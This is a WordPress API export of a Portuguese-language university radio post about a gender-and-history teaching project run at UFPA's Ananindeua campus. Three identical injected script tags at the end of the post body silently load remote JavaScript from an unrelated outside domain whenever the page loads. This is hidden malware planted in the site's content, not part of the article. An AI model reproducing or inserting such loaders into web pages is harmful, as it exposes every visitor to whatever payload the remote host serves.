{"id":7856,"date":"2020-12-15T08:00:21","date_gmt":"2020-12-15T10:00:21","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=7856"},"modified":"2025-10-21T11:40:03","modified_gmt":"2025-10-21T14:40:03","slug":"lugar-de-mulher-e-onde-ela-quiser","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/","title":{"rendered":"Lugar de mulher \u00e9 onde ela quiser"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2020-2\/UNIVERSIDADE%20MULTICAMPI%20-%20LUGAR%20DE%20MULHER%20\u00c9%20ONDE%20ELA%20QUISER%20-%2015.12.20.mp3'>Universidade Multicampi - Lugar de Mulher \u00e9 Onde Ela Quiser<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2020-2\\\/UNIVERSIDADE MULTICAMPI - LUGAR DE MULHER \\u00c9 ONDE ELA QUISER - 15.12.20.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"Universidade Multicampi - Lugar de Mulher \\u00e9 Onde Ela Quiser\",\"caption\":\"\",\"description\":\"\\\"UNIVERSIDADE MULTICAMPI - LUGAR DE MULHER \\u00c9 ONDE ELA QUISER - 15.12.20\\\". Genre: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"Universidade Multicampi\",\"genre\":\"Other\",\"length_formatted\":\"32:00\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n<p>Neste Universidade Multicampi o tema \u00e9 o projeto <strong>Lugar de mulher \u00e9 onde ela quiser: G\u00eanero e ensino de Hist\u00f3ria<\/strong>. A convidada \u00e9 Anna Maria Alves Linhares, professora adjunta da UFPA no campus de Ananindeua.<\/p>\n<p>A professora \u00e9 graduada em Ci\u00eancias Sociais pela UFPA, com mestrado em Antropologia e doutorado em Hist\u00f3ria Social da Amaz\u00f4nia pela mesma institui\u00e7\u00e3o. Ao longo do programa, ela conta como se interessou pelo movimento feminista com a sua entrada na universidade na d\u00e9cada de 1990 e, desde ent\u00e3o, tem se dedicado a estudar sobre o assunto, que agora deu origem ao projeto <strong>Lugar de mulher \u00e9 onde ela quiser<\/strong>, criado em 2017. A proposta visa trabalhar com a quest\u00e3o do g\u00eanero e os diversos desafios enfrentados pelas mulheres na nossa sociedade, atrav\u00e9s de discuss\u00f5es sobre textos e filmes e a realiza\u00e7\u00e3o de oficinas nas escolas de Ananindeua.<\/p>\n<p>Durante a conversa, quest\u00f5es como a falta de conhecimento sobre o movimento feminista no ensino b\u00e1sico e a invisibiliza\u00e7\u00e3o das mulheres ao longo da hist\u00f3ria s\u00e3o colocadas em pauta. Trazendo tamb\u00e9m relatos sobre as experi\u00eancias com o projeto, a professora Anna Linhares relata como j\u00e1 se pode notar mudan\u00e7as com o decorrer dos anos e que, cada vez mais, \u00e9 poss\u00edvel desmistificar as ideias pr\u00e9-existentes sobre o movimento.<\/p>\n<p>Ela refor\u00e7a ainda o importante papel da educa\u00e7\u00e3o neste processo. &#8220;Apesar de ver muitas mudan\u00e7as, ainda s\u00e3o em passos lentos porque quando a gente fala sobre educa\u00e7\u00e3o isso n\u00e3o se d\u00e1 de uma hora para outra\u2026 N\u00e3o basta ler, tem que seguir trabalhando com educa\u00e7\u00e3o e projetos, e n\u00e3o s\u00f3 em hist\u00f3ria, n\u00e3o s\u00f3 nas ci\u00eancias sociais, tem que ser algo feito em conjunto com todos os cursos, com todas as \u00e1reas de conhecimento&#8221;, diz a pesquisadora.<\/p>\n<p>Para mais informa\u00e7\u00f5es sobre \u00e9 s\u00f3 mandar um e-mail para lugardemulhernahistoria@gmail.com e para saber mais sobre o projeto L<strong>ugar de mulher \u00e9 onde ela quiser: G\u00eanero e ensino de Hist\u00f3ria<\/strong>, n\u00e3o perca esta edi\u00e7\u00e3o do Universidade Multicampi.<\/p>\n<p>Apresenta\u00e7\u00e3o: Elissandra Batista<br \/>\nProdu\u00e7\u00e3o e roteiro: Ana Rosa Batista<br \/>\nGrava\u00e7\u00e3o e montagem: Jo\u00e3o Nilo e Felipe Rocha<br \/>\nSupervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<\/p>\n<p>O programa vai ao ar na ter\u00e7a-feira, \u00e0s 10h.<br \/>\nHor\u00e1rios alternativos: Quinta-feira, \u00e0s 21h; e s\u00e1bado, \u00e0s 19h.<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Lugar de mulher \u00e9 onde ela quiser\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\" aria-label=\"Read more about Lugar de mulher \u00e9 onde ela quiser\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":7859,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-7856","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-universidade-multicampi"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Lugar de mulher \u00e9 onde ela quiser - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O projeto Lugar de Mulher \u00e9 Onde ela Quiser \u00e9 realizado no campus da UFPA em Ananindeua e foca na discuss\u00e3o de tem\u00e1ticas de g\u00eanero e do feminismo.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Lugar de mulher \u00e9 onde ela quiser - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O projeto Lugar de Mulher \u00e9 Onde ela Quiser \u00e9 realizado no campus da UFPA em Ananindeua e foca na discuss\u00e3o de tem\u00e1ticas de g\u00eanero e do feminismo.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-15T10:00:21+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:40:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"670\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Lugar de mulher \u00e9 onde ela quiser\",\"datePublished\":\"2020-12-15T10:00:21+00:00\",\"dateModified\":\"2025-10-21T14:40:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\"},\"wordCount\":417,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1\",\"articleSection\":[\"Universidade Multicampi\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\",\"name\":\"Lugar de mulher \u00e9 onde ela quiser - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1\",\"datePublished\":\"2020-12-15T10:00:21+00:00\",\"dateModified\":\"2025-10-21T14:40:03+00:00\",\"description\":\"O projeto Lugar de Mulher \u00e9 Onde ela Quiser \u00e9 realizado no campus da UFPA em Ananindeua e foca na discuss\u00e3o de tem\u00e1ticas de g\u00eanero e do feminismo.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1\",\"width\":1200,\"height\":670},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Lugar de mulher \u00e9 onde ela quiser\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Lugar de mulher \u00e9 onde ela quiser - Radio Web UFPA","description":"O projeto Lugar de Mulher \u00e9 Onde ela Quiser \u00e9 realizado no campus da UFPA em Ananindeua e foca na discuss\u00e3o de tem\u00e1ticas de g\u00eanero e do feminismo.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/","og_locale":"pt_BR","og_type":"article","og_title":"Lugar de mulher \u00e9 onde ela quiser - Radio Web UFPA","og_description":"O projeto Lugar de Mulher \u00e9 Onde ela Quiser \u00e9 realizado no campus da UFPA em Ananindeua e foca na discuss\u00e3o de tem\u00e1ticas de g\u00eanero e do feminismo.","og_url":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2020-12-15T10:00:21+00:00","article_modified_time":"2025-10-21T14:40:03+00:00","og_image":[{"width":1200,"height":670,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Lugar de mulher \u00e9 onde ela quiser","datePublished":"2020-12-15T10:00:21+00:00","dateModified":"2025-10-21T14:40:03+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/"},"wordCount":417,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1","articleSection":["Universidade Multicampi"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/","url":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/","name":"Lugar de mulher \u00e9 onde ela quiser - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1","datePublished":"2020-12-15T10:00:21+00:00","dateModified":"2025-10-21T14:40:03+00:00","description":"O projeto Lugar de Mulher \u00e9 Onde ela Quiser \u00e9 realizado no campus da UFPA em Ananindeua e foca na discuss\u00e3o de tem\u00e1ticas de g\u00eanero e do feminismo.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1","width":1200,"height":670},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/universidade-multicampi\/lugar-de-mulher-e-onde-ela-quiser\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Lugar de mulher \u00e9 onde ela quiser"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Feminismo.jpg?fit=1200%2C670&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-22I","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7856","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=7856"}],"version-history":[{"count":5,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7856\/revisions"}],"predecessor-version":[{"id":17604,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7856\/revisions\/17604"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/7859"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=7856"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=7856"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=7856"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}